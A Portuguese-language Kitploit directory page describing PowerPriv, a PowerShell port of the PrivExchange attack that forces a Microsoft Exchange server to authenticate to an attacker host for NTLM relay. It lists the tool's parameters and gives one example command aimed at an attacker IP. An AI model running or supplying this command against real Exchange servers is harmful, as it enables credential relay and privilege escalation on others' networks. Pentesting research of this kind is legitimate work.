Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PowerPriv — Uma implementação em PowerShell do PrivExchange projetada para ser executada no contexto do usuário atual | Kitploit
Ferramentas/GitHubGitHub/g0ldengunsec/powerpriv
Escalada de PrivilégiosExploraçãoMovimento LateralTestes de PenetraçãoAutenticação
GitHubg0ldengunsec/powerpriv

PowerPriv

Uma implementação em PowerShell do PrivExchange projetada para ser executada no contexto do usuário atual

Ver Repositório
12524há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PowerPriv

DESCRIÇÃO

Uma implementação em powershell do PrivExchange por @_dirkjan (código original encontrado aqui: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Útil para ambientes onde você não pode executar aplicativos baseados em Python, possui credenciais de usuário ou não deseja gravar arquivos no disco. Fará com que a conta do sistema do servidor Exchange de destino tente autenticar em um sistema de sua escolha.

-targetHost

Nome do host ou IP da caixa de Exchange de destino. Com base na configuração de DNS, pode exigir FQDN se usar nome do host. (Obrigatório)

-attackerHost

Nome do host ou IP de um sistema que você controla e, idealmente, está executando ntlmrelayx nele. Estamos dizendo ao servidor Exchange para tentar autenticar neste sistema. Com base na configuração de DNS, pode exigir FQDN se usar nome do host. (Obrigatório)

-exchangePort

Porta para tentar conectar ao servidor Exchange. O padrão é 443.

-attackerPort

Porta que o Exchange deve tentar conectar de volta ao atacante. O padrão é 80

-attackerPage

Página que estamos dizendo ao servidor Exchange para conectar em nosso sistema de ataque. Barras não são necessárias. O padrão é powerPriv.

-noSSL

Defina como true se você não quiser usar https para conectar inicialmente ao servidor Exchange. O padrão é false (usar https).

-Version

Versão do servidor Exchange que estamos almejando. O padrão é 2013.

EXEMPLO

root@kitploit:~
powerPriv -targetHost corpExch01 -attackerHost 192.168.1.17 -Version 2016

NOTAS

root@kitploit:~
Autor: @g0ldenGunSec - Baseado na ferramenta criada por @_dirkjan
Use esta ferramenta apenas em redes que você possui ou tem permissão para testar.
Baixar ferramenta